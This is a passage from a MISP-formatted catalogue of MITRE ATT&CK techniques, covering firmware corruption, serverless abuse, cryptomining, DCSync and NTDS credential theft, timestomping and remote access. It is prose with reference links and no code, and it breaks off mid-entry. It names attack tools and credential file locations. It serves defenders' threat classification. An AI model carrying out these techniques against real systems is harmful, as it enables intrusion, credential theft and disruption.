In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485).

The tag is: misp-galaxy:mitre-attack-pattern="Firmware Corruption - T1495"

Table 6322. Table References

Links

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

https://attack.mitre.org/techniques/T1495

https://cyber.dhs.gov/assets/report/ar-16-20173.pdf

https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

Serverless Execution - T1648

Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.

Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the IAM:PassRole permission in AWS or the iam.serviceAccounts.actAs permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)

Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)

The tag is: misp-galaxy:mitre-attack-pattern="Serverless Execution - T1648"

Table 6323. Table References

Links

https://attack.mitre.org/techniques/T1648

https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team

https://www.varonis.com/blog/power-automate-data-exfiltration

Resource Hijacking - T1496

Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)

Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)

Adversaries may also use malware that leverages a system’s network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)

The tag is: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496"

Table 6324. Table References

Links

https://attack.mitre.org/techniques/T1496

https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc

https://securelist.com/lazarus-under-the-hood/77908/

https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html

https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html

https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

Service Stop - T1489

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary’s overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)

Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Service Stop - T1489"

Table 6325. Table References

Links

https://attack.mitre.org/techniques/T1489

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.secureworks.com/research/wcry-ransomware-analysis

Data Manipulation - T1565

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565"

Table 6326. Table References

Links

https://attack.mitre.org/techniques/T1565

Native API - T1575

Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.

The NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library.(Citation: Google NDK Getting Started)

Adversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors.(Citation: MITRE App Vetting Effectiveness)

The tag is: misp-galaxy:mitre-attack-pattern="Native API - T1575"

Table 6327. Table References

Links

https://attack.mitre.org/techniques/T1575

https://developer.android.com/ndk/guides

https://www.mitre.org/sites/default/files/publications/pr-16-4772-analyzing-effectiveness-mobile-app-vetting-tools-report.pdf

Establish Accounts - T1585

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585"

Table 6328. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1585

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Active Scanning - T1595

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Active Scanning - T1595"

Table 6329. Table References

Links

https://attack.mitre.org/techniques/T1595

https://wiki.owasp.org/index.php/OAT-004_Fingerprinting

https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf

Financial Theft - T1657

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin)

Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)

Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)

The tag is: misp-galaxy:mitre-attack-pattern="Financial Theft - T1657"

Table 6330. Table References

Links

https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2

https://attack.mitre.org/techniques/T1657

https://www.bbc.com/news/technology-60933174

https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf

https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/::text=Vendor%20email%20compromise%2C%20also%20referred

https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view

https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf

https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and

https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs

https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html

https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/

Compromise Accounts - T1586

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586"

Table 6331. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1586

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Dynamic Resolution - T1568

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568"

Table 6332. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

https://attack.mitre.org/techniques/T1568

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Content Injection - T1659

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)

Adversaries may inject content to victim systems in various ways, including:

  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)

  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)

The tag is: misp-galaxy:mitre-attack-pattern="Content Injection - T1659"

Table 6333. Table References

Links

https://attack.mitre.org/techniques/T1659

https://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/

https://usa.kaspersky.com/blog/man-on-the-side/27854/

https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

System Services - T1569

Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.

The tag is: misp-galaxy:mitre-attack-pattern="System Services - T1569"

Table 6334. Table References

Links

https://attack.mitre.org/techniques/T1569

Develop Capabilities - T1587

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

The tag is: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587"

Table 6335. Table References

Links

https://attack.mitre.org/techniques/T1587

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Obtain Capabilities - T1588

Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588"

Table 6336. Table References

Links

https://attack.mitre.org/techniques/T1588

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

https://www.recordedfuture.com/cobalt-strike-servers/

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Adversary-in-the-Middle - T1638

Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642).

[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic.

Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning.

If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

The tag is: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1638"

Table 6337. Table References

Links

https://attack.mitre.org/techniques/T1638

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-8.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-12.html

Adversary-in-the-Middle - T1557

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

The tag is: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557"

Table 6338. Table References

Links

https://arxiv.org/abs/1809.05681

https://attack.mitre.org/techniques/T1557

https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/

https://securelist.com/ad-blocker-with-miner-included/101105/

https://tlseminar.github.io/downgrade-attacks/

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Add-ins - T1137.006

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

The tag is: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006"

Table 6339. Table References

Links

https://attack.mitre.org/techniques/T1137/006

https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf

https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460

https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique

Regsvcs/Regasm - T1218.009

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009"

Table 6340. Table References

Links

https://attack.mitre.org/techniques/T1218/009

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://msdn.microsoft.com/en-us/library/04za0hca.aspx

https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx

Steganography - T1001.002

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002"

Table 6341. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001/002

NTDS - T1003.003

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

  • Volume Shadow Copy

  • secretsdump.py

  • Using the in-built Windows tool, ntdsutil.exe

  • Invoke-NinjaCopy

The tag is: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003"

Table 6342. Table References

Links

http://adsecurity.org/?p=1275

https://attack.mitre.org/techniques/T1003/003

https://en.wikipedia.org/wiki/Active_Directory

DCSync - T1003.006

Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller’s application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account’s password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)

The tag is: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006"

Table 6343. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

https://adsecurity.org/?p=1729

https://attack.mitre.org/techniques/T1003/006

https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM

https://github.com/gentilkiwi/mimikatz/wiki/module--lsadump

https://msdn.microsoft.com/library/cc228086.aspx

https://msdn.microsoft.com/library/cc237008.aspx

https://msdn.microsoft.com/library/cc245496.aspx

https://msdn.microsoft.com/library/dd207691.aspx

https://source.winehq.org/WineAPI/samlib.html

https://wiki.samba.org/index.php/DRSUAPI

Timestomp - T1070.006

Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.

Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006"

Table 6344. Table References

Links

http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

https://attack.mitre.org/techniques/T1070/006

SSH - T1021.004

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.

The tag is: misp-galaxy:mitre-attack-pattern="SSH - T1021.004"

Table 6345. Table References

Links

https://attack.mitre.org/techniques/T1021/004

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

VNC - T1021.005

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)

